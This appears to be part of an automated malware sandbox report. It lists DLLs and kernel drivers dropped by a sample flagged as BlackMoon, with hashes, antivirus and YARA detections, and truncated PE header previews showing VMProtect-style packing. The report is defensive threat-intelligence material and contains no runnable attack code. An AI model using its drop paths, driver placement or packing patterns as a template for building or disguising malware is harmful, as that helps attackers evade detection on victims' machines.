                                                                                                                                    SHA-512:FF02058DDE5A09E2DCE1FA9B5E8EBEC29809ACABA29A1D87623CAA40713C95B9AEE2A73F97632152F4D80FA270E5DE30BCA8A263A31A762B0339795139AAE964
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll, Author: Joe Security
                                                                                                                                    • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DB37C1B99\BD950wrst.dll, Author: ditekSHen
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 61%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2-x.vL..vL..vL...S..tL...P..wL..CI.qL...P..XL..@j..L..S..pL../o..tL..CK.UL..vL..N..@j..L..vL..wL..S..xL..J..wL..S..wL..RichvL..................PE..L...eb.]...........!.....0?..........O<......@?..............................0P......................................*@.M...8.?.|.... P......................@N.|....................................................@?..............................text...J'?......0?................. ..`.rdata..]....@?......@?.............@..@.data........0@......0@.............@....vmp0........ K.. ....H.............`..`.reloc..|....@N.......K.............@..@.rsrc........ P.......M.............@...........................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\DC9B0A72\DE3EC8324.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1248768
                                                                                                                                    Entropy (8bit):6.676222335773298
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:f2vEztMdcDrgilCB36NjnQ1Ho6z253hiNL:bztMdcDrgiA6NjIDz253
                                                                                                                                    MD5:2C5F99EEC6A7B98AE489A253FA1F4151
                                                                                                                                    SHA1:B0369DEF36C4C1AFA9A2E2BA727A30B9D4DD31C0
                                                                                                                                    SHA-256:678546CC0CF5260EA51F7104BC4DEEB6F84D9BEAFE1E09F9B487A7579E40F959
                                                                                                                                    SHA-512:0571B74B63FB461322313F1685A84A4421EF21223D7708552E39CCBCF2AEA2C4A1221257B31467876A4A1F66433CF852DB1C460EE75EF2C85245DBA36455AB68
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l5^.(T0.(T0.(T0.....+T0.G"..lT0.G"..NT0.G"...T0.!,..!T0.(T1..T0.(T0.)T0.G"...T0.G"..)T0.Rich(T0.........PE..L....r.c...........!.....L...................`...............................P............@.....................................d................................... d..............................@...@............`...............................text...3J.......L.................. ..`.rdata..bY...`...Z...P..............@..@.data...(...........................@....reloc...............T..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\E71620\712EVTPSM.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):278528
                                                                                                                                    Entropy (8bit):6.462799085037293
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:6144:qy8Rmc6sJdYFZY4yRc7979wypicS7UItAvl:clsYfu79pwypi949
                                                                                                                                    MD5:11D29986E22E3033FAD22362D5BB9B9E
                                                                                                                                    SHA1:2CE91BCAE7EA963FFDA9A797D4405AB87F2C77CD
                                                                                                                                    SHA-256:0D518D5120378DE44E8157A8F83F8AAF5BEB71A45BBF73C913F71E4BC9DCCEEB
                                                                                                                                    SHA-512:70D6C30DCB3F52E45F2C5E4859BD1238CB17DB56616E8A6A75942C92300365DE271D9FDE54F14822E0287D8A547E4523B42BB2F648491EB9C83ACFA2F734AAE8
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e....................3........3......3..........%.......3....3....3....3....Rich............PE..L...!r.T...........!.........H...............0............................................@.........................P................0..0....................P...,..................................py..@............0...............................text............................... ..`.rdata.......0......................@..@.data....E.......$..................@....rsrc...0....0......................@..@.reloc..NB...P...D..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\F03D5C\9605A212x.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):98304
                                                                                                                                    Entropy (8bit):5.723671248831358
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:bOpvODXphadHM/653RQBwXm/KURjSDhfmjjp5QsKDhwO3b:kKZiM/65SCYymP3NKDhwE
                                                                                                                                    MD5:DD3B0103C412D3A0781FF32EBC4C7D0C
                                                                                                                                    SHA1:DDDD4AC4CC8961D6EBFA28A4DC627EB92E20B1E5
                                                                                                                                    SHA-256:DE3CCEC54582DA666CAA1FBC1FAB4BF6192189169E4470C82B194FCD0344CCE5
                                                                                                                                    SHA-512:BC04B56A5D199BBC86FA4E353CE781B0F8FAFB2A7F1B0612CB295284C15C28704DD9344D5B1227344253B8CC0FBA2402C117A43DBAAD4115A3DAB2DB041C0706
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}H..&...&...&...&...&...-...&...(...&...,...&..."...&..:-...&..:"...&...'.5.&...5...&.u.-...&.Z. ...&.u."...&.Rich..&.........PE..L...^.8Z...........!................................................................................................ :.......5.......`.......................p..........................................................@............................text............................... ..`.rdata...+.......0..................@..@.data........@.......@..............@....rsrc........`.......P..............@..@.reloc..B....p... ...`..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\AA23FEB7\I779AD\DC1FFAF.ini

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:Generic INItialization configuration [clogs]
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):527
                                                                                                                                    Entropy (8bit):5.992488048983519
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:8hZfCAZX4PykyxshOsyXoQMMoWFofCAZX4PykyxshOsyXoQMt:opZ4ykyxs3y4R9pZ4ykyxs3y4Rt
                                                                                                                                    MD5:9275FBEC2B2611DBFDAB5CF5061784D3
                                                                                                                                    SHA1:5C8CD33671E7031708B9A3637CEAE0025E055DA2
                                                                                                                                    SHA-256:1AE540EB02B663F044493A286BF4DE3D4EB424F736EA718BBE7DAD3FEF32C908
                                                                                                                                    SHA-512:663D0CDF6E320488D478A94E985EAB70B9D6DB0255D8071AA96BD7AFA428412B7240694EE05D32CE3031F3592505A0E5A0663DE933B864DFD5090F69EEC2E027
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:[logs]..get=1..08-06 04:29:20:1375..SlBBJr4jZfugS44Ey58GZjeqSHOA671bOwDpcwqjSznb7aC9/F3XH7E/LUENwZrbWdoHPf1sfbBjk6IwCpB/OXC57k86y0+wOKdzEMY7BITyrd212scVA4M6qxVNiHF4WpuGlK0Zb3+Exypxe9+0fDYlIWGelOlOhg2iGfQ56P+Fk9WfykpPuNH1hAjPDyQ9G2RLQ32IaHPuBqpBjBgQ8dpeUNvt4wUW..[clogs]..log11=1..08-06 04:29:20:1375..SlBBJr4jZfugS44Ey58GZjeqSHOA671bOwDpcwqjSznb7aC9/F3XH7E/LUENwZrbWdoHPf1sfbBjk6IwCpB/OXC57k86y0+wOKdzEMY7BITyrd212scVA4M6qxVNiHF4WpuGlK0Zb3+Exypxe9+0fDYlIWGelOlOhg2iGfQ56P+Fk9WfykpPuNH1hAjPDyQ9G2RLQ32IaHPuBqpBjBgQ8dpeUNvt4wUW..

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\B5155CBEC4E\51D610yws.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):13312
                                                                                                                                    Entropy (8bit):5.397635444561731
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:/o5r2+6acxUj33TwlsXsDonjrWgncCMxOR3XkEqbp9K6ydDrjf9:A5Otx8HTweXssvWtxOt0L71yRrZ
                                                                                                                                    MD5:6D4F24374636A1D2B18D23508E94A5AF
                                                                                                                                    SHA1:6056E57026F5106BE7448650A711088F7F26B81B
                                                                                                                                    SHA-256:1001BED009D07EFADF0A1784CB07E79A362EAA4CDE62C43E8EC226B210E1388E
                                                                                                                                    SHA-512:3013651D862D731746A238AB729023506E65C7A8DE2E9967482B7356923296581C7F004B604D560DECB0B5FD32FAB3087DF7C4528C3EE1C6BC75C4E3A7D621FD
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n..T...T...T...s..P....@..U...J]..U...J]..Z...J]..]...J]..Q...T...>...J]..V...J]..U...J]..U...J]..U...RichT...........................PE..L....8.\...........!................"........0...............................p............@......................... =..5...<8..P....P..,....................`..t....1...............................3..@............0...............................text............................... ..`.rdata..U....0......................@..@.data........@.......$..............@....rsrc...,....P.......&..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\C1CE322\DE840zzuv.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):614400
                                                                                                                                    Entropy (8bit):7.9216008760747325
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:v39HfzCgZ1UpcBLioopeCTKtYF3ECT9IhYWaTy94yVOvV3m3:vtLCcUpQmomea9F3B+XY2Ohm3
                                                                                                                                    MD5:1CD5B851B0AC196F36DF69B82DDD475E
                                                                                                                                    SHA1:A8831A73E9FB0FE78B110681F13300A56898680A
                                                                                                                                    SHA-256:23A842D3EE1B7724999BE5C8676BE999294D63B9BB94492E6BB4C0FB1A0D1402
                                                                                                                                    SHA-512:650053FFF05DF29976AF65347A5C9850B52186E0847BA2A7A05E3662E5CD607BDA5CA8B7290FFC56F6B786FE337FD8C48CCA8B953482C0C54AED5C1C041EC690
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n...n...n...q..n...q..n...r..n...a...n..Xr...n..Xf...n...H.bn..3q..n...H...n...n..Bl...a...n...H.an...n...n..3q..n..3q...n..Rich.n..........PE..L.....\...........!.........`......^........................................0!........................................d.................................... !....................................................... ..............................text....|.......................... ..`.rdata..............................@..@.data...q.... ......................@....vmp0...Y...........................`..`.vmp1....4.......@..................`....reloc....... !......P..............@..B........................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\CDC745\17B0883wr.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):13312
                                                                                                                                    Entropy (8bit):5.397635444561731
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:/o5r2+6acxUj33TwlsXsDonjrWgncCMxOR3XkEqbp9K6ydDrjf9:A5Otx8HTweXssvWtxOt0L71yRrZ
                                                                                                                                    MD5:6D4F24374636A1D2B18D23508E94A5AF
                                                                                                                                    SHA1:6056E57026F5106BE7448650A711088F7F26B81B
                                                                                                                                    SHA-256:1001BED009D07EFADF0A1784CB07E79A362EAA4CDE62C43E8EC226B210E1388E
                                                                                                                                    SHA-512:3013651D862D731746A238AB729023506E65C7A8DE2E9967482B7356923296581C7F004B604D560DECB0B5FD32FAB3087DF7C4528C3EE1C6BC75C4E3A7D621FD
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n..T...T...T...s..P....@..U...J]..U...J]..Z...J]..]...J]..Q...T...>...J]..V...J]..U...J]..U...J]..U...RichT...........................PE..L....8.\...........!................"........0...............................p............@......................... =..5...<8..P....P..,....................`..t....1...............................3..@............0...............................text............................... ..`.rdata..U....0......................@..@.data........@.......$..............@....rsrc...,....P.......&..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):2482176
                                                                                                                                    Entropy (8bit):7.655801729535385
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:49152:vdt5TgZvBnBS7YWtu4uEiWaitbURcdltQ+LPfzgPKJdqL0B2eYL7YuPqpu0RKnX7:X5TgZvBnBS7YWtu4uEiWaitbURcdltQZ
                                                                                                                                    MD5:ED77B38E6DEACCC15EE7A3CDE313BF37
                                                                                                                                    SHA1:F9D6E7CA545790F385F35069230C153E38D84FF1
                                                                                                                                    SHA-256:2A7469FE77A4659592FE7E2C36D32343B3C8E728BB52EAEDA0CAE03BC74EAAB5
                                                                                                                                    SHA-512:594CA225AF6AB65688A2D891198B34D426B55F7B6CF55D366408D42DCC97B0E3A682D033F382CCE165D5DDE18381B88040F73BDC3D0C314E0C4D12AE32A09601
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_blackmoon, Description: Yara detected BlackMoon Ransomware, Source: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll, Author: Joe Security
                                                                                                                                    • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\Desktop\EEC3DA20E\CFDEE45078\C2B2CFEA7.dll, Author: ditekSHen
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 85%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|...8...8...8...W...1...W...>...C...;.......0.............:..............:...........8.............8...9.......".......9...Rich8...........PE..L....o]...........!.........P......a..............E..........................(......................................A..K....$..,.............................(.D[......................................................T............................text...^........................... ..`.rdata..Ka.......p..................@..@.data........P.......P..............@....vmp0...13...P...@...@..............`..`.reloc..D[....(..`....%.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\E2416B28\38902yywx.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):200704
                                                                                                                                    Entropy (8bit):7.840036180451055
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:DtWru7tGhV0AD1Lciipl4gseTwdDV5PEv4gtJDxbs29mHzsKl5eUMfSrxrO:0ru7tGcJLqgseTMV9ivFsZ2XSM
                                                                                                                                    MD5:A366501F2CE6ABA81384C2688AF599C1
                                                                                                                                    SHA1:2A3A109CCFFCE9F1245B328E521120AC2FBFF66B
                                                                                                                                    SHA-256:233D8F1CB06995B505F4CECBAFE0DD53635BF820002C512639DD5A0B87827086
                                                                                                                                    SHA-512:4FA0E0BB6396ED2D8DB837EE010CD647DE4799AE9C111DB056EB7E0DC02D0D3BE936BDCD8342923DE359415890D9602BA0DEC20ED1111D68BAC5D38C2DDDB142
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 54%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................D.............=......<................9..........Rich...........PE..L......`...........!.........:...........................................................@.................................h1..d............................p......,f...............................e..@...............4............................text...v........................... ..`.rdata...K..........................@..@.data...H...........................@....vmp0....j..........................`....vmp1........`......................`....reloc.......p......................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\EC4D54E4D0\338Atwspn.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):13312
                                                                                                                                    Entropy (8bit):5.397635444561731
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:192:/o5r2+6acxUj33TwlsXsDonjrWgncCMxOR3XkEqbp9K6ydDrjf9:A5Otx8HTweXssvWtxOt0L71yRrZ
                                                                                                                                    MD5:6D4F24374636A1D2B18D23508E94A5AF
                                                                                                                                    SHA1:6056E57026F5106BE7448650A711088F7F26B81B
                                                                                                                                    SHA-256:1001BED009D07EFADF0A1784CB07E79A362EAA4CDE62C43E8EC226B210E1388E
                                                                                                                                    SHA-512:3013651D862D731746A238AB729023506E65C7A8DE2E9967482B7356923296581C7F004B604D560DECB0B5FD32FAB3087DF7C4528C3EE1C6BC75C4E3A7D621FD
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n..T...T...T...s..P....@..U...J]..U...J]..Z...J]..]...J]..Q...T...>...J]..V...J]..U...J]..U...J]..U...RichT...........................PE..L....8.\...........!................"........0...............................p............@......................... =..5...<8..P....P..,....................`..t....1...............................3..@............0...............................text............................... ..`.rdata..U....0......................@..@.data........@.......$..............@....rsrc...,....P.......&..............@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\FFA96FF9\FB97GB461.dll

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):614400
                                                                                                                                    Entropy (8bit):7.9216008760747325
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:v39HfzCgZ1UpcBLioopeCTKtYF3ECT9IhYWaTy94yVOvV3m3:vtLCcUpQmomea9F3B+XY2Ohm3
                                                                                                                                    MD5:1CD5B851B0AC196F36DF69B82DDD475E
                                                                                                                                    SHA1:A8831A73E9FB0FE78B110681F13300A56898680A
                                                                                                                                    SHA-256:23A842D3EE1B7724999BE5C8676BE999294D63B9BB94492E6BB4C0FB1A0D1402
                                                                                                                                    SHA-512:650053FFF05DF29976AF65347A5C9850B52186E0847BA2A7A05E3662E5CD607BDA5CA8B7290FFC56F6B786FE337FD8C48CCA8B953482C0C54AED5C1C041EC690
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 78%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............n...n...n...q..n...q..n...r..n...a...n..Xr...n..Xf...n...H.bn..3q..n...H...n...n..Bl...a...n...H.an...n...n..3q..n..3q...n..Rich.n..........PE..L.....\...........!.........`......^........................................0!........................................d.................................... !....................................................... ..............................text....|.......................... ..`.rdata..............................@..@.data...q.... ......................@....vmp0...Y...........................`..`.vmp1....4.......@..................`....reloc....... !......P..............@..B........................................................................................................................................................................................................................................

                                                                                                                                    C:\Users\user\Desktop\EEC3DA20E\J1AFF12

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):468
                                                                                                                                    Entropy (8bit):7.48101029456254
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:Qhxnaficms7BkOshMhZdomARB0xgMhwLvW21aXqHVGYB+Urf+cshM0BpART:Qnafi07SOshMhZqmARB0xgMhMW2UqHLX
                                                                                                                                    MD5:F43E2C52A767606BD68189CA7364107D
                                                                                                                                    SHA1:8B52C3BD388771A5B2C6C75FD68B2C81EEDF9B47
                                                                                                                                    SHA-256:FE22138EEC73793D0F1FAE4B8D975F8A1E956152B50BE5B63F6A6C8E228C801B
                                                                                                                                    SHA-512:BAE0A0060D3AFD9BC21DD42B977E356B1B5B3ECC5BD9FDC718B8B0D79B372261D1DFCA58CDAE7E981818ECD2BCD40420B1A764014EE42C1BAE08C0B8A9249DB5
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:g`o.TisfagIq~a {qc..............X"".STrNFNyMM.\HB12-456189:5<=>9@AB=.EFA0"....`;1#RMTUVQXYZU\]^Y`ab]defafije...6......._...u|}~y...}............................................................................................................$.......8rj.*wgs........................a..,.VN[.[KW,-.)012-456189:5<=>9HAB=."#$;!0k>,<IPQRMTUVQXYZU\]^Y`ab]aefa)......G...mtuvqxyzu|}~y...}...........................................................................

                                                                                                                                    C:\Windows\DC1FFAF.sys

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1349848
                                                                                                                                    Entropy (8bit):7.864082221229252
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:Pac4DTXlCYc1B/OOIZudchfHOPYkQHfWcBlGxCvHUxbx5xv1zbBPMnhxA:CcuXlCb3GOIZudchOPx+w4f6bx5rJPM4
                                                                                                                                    MD5:CDD1B62EA2E7BBD3461B0C9D2C281477
                                                                                                                                    SHA1:2D424B7099F3A23570E8C8E5473DC95402B4FFBC
                                                                                                                                    SHA-256:CAAFF0DCC09F316AAFF1973A29604DA3AD8ED6DDA896AD9484433AFC7A15C1FA
                                                                                                                                    SHA-512:13E1027A11AD556942B06AF2659CE5F02DBE03F269DD33F1938220A6EDFA3EF66D8A493C135AF226CCB397223B26AC52DA7A2D15E8DF1871D3710E294878405D
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........J.~...~...~...~...~....,..~....<..~....*..~....q..~....r..~..~.^..~..~._..~..~.a..~..Rich.~..........PE..d...E@jf.........."..........&.......3.........@..............................+......X....`..................................................3+.P...............,.............+.$....q+.............................0p+.............. ..0............................text....~.......................... ..h.rdata..<F..........................@..H.data...............................@....pdata..,...........................@..HINIT................................ ..`.vvd0...s...........................`..h.vvd1...............................`....reloc..$.....+.....................@..B........................................................................................................................................................................................

                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                    File Type:JSON data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):55
                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                    Malicious:false
                                                                                                                                    Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                    C:\Windows\SysWOW64\2865ivSJ0.sys

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1236680
                                                                                                                                    Entropy (8bit):7.872958544431707
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:D7brDFHYN8IvCw9kTYmQxpPt64aE4oTADGE07mBzL/wOb1xUvn2:PR4eIvCxU/pF64aMIGIzLjxG2
                                                                                                                                    MD5:465E63D6B57C2123298FB93E365619D1
                                                                                                                                    SHA1:2B9A02B051BB017219F1FB757EA1C3DC89826F89
                                                                                                                                    SHA-256:1E7A44ED4DBB975279A1081D36451F17EAECD65897D5C28F8C8DAFF2464E86E0
                                                                                                                                    SHA-512:C060CFECAAB69C991EEBD11843110DD952AB5CC9A16ADD2981B84AF507FFC9712C2EFFE21DBA6D652BBAD16461275FB2844D0F0CB01EBD3A86C200C5958529C2
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........J.~...~...~...~...~....,..~....<..~....*..~....q..~....r..~..~.^..~..~._..~..~.a..~..Rich.~..........PE..d...E@jf.........."..........&.......H.........@..............................(......`....`.....................................................P...............,........&....(.<....p(..............................o(..............0..0............................text....~.......................... ..h.rdata..<F..........................@..H.data...............................@....pdata..,...........................@..HINIT................................ ..`.vvd0...............................`..h.vvd1...............................`....reloc..<.....(.....................@..B........................................................................................................................................................................................

                                                                                                                                    C:\Windows\SysWOW64\A16652yzz.sys

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1284704
                                                                                                                                    Entropy (8bit):7.864019390308608
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:24576:obVjS19Tgw2F4CqVOZKZ+YM9oIiZT9GJSH7QJTPi7LDXW4UDOWd3ctFZg:iVc5g1F4CqVOZYbZT9cbti3XLOOm3cto
                                                                                                                                    MD5:9EAF126D6896B0739F295CAE9BD84A58
                                                                                                                                    SHA1:8CA630C64E388A63E627D9A8AB0DE93E82F7404B
                                                                                                                                    SHA-256:252AF6D398046E3317C329E8ACFED8D5AFE3689894ADAF7CFAC73381F6133435
                                                                                                                                    SHA-512:B6ED1FF2ECBD2C06F3490BC7B279CAAB106E69EC0CD0C571A63EADE55B6778ED06B36A022D2F5161C4FC04EE4FA0475D336C6BD53E275561F3286200B265E720
                                                                                                                                    Malicious:true
                                                                                                                                    Antivirus:
                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                    • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........J.~...~...~...~...~....,..~....<..~....*..~....q..~....r..~..~.^..~..~._..~..~.a..~..Rich.~..........PE..d...E@jf.........."..........&......m..........@..............................)...........`.................................................@!..P...............,.......`.....).....(.).............................X.).............. '.0............................text....~.......................... ..h.rdata..<F..........................@..H.data...............................@....pdata..,...........................@..HINIT................................ ..`.vvd0...l...........................`..h.vvd1...D~..........................`....reloc........).....................@..B........................................................................................................................................................................................

                                                                                                                                    C:\Windows\SysWOW64\BC66DPQaf.sys

                                                                                                                                    Download File
                                                                                                                                    Process:C:\Program Files (x86)\Java\DC1FFAF.exe
                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):1349848
                                                                                                                                    Entropy (8bit):7.864082221229252
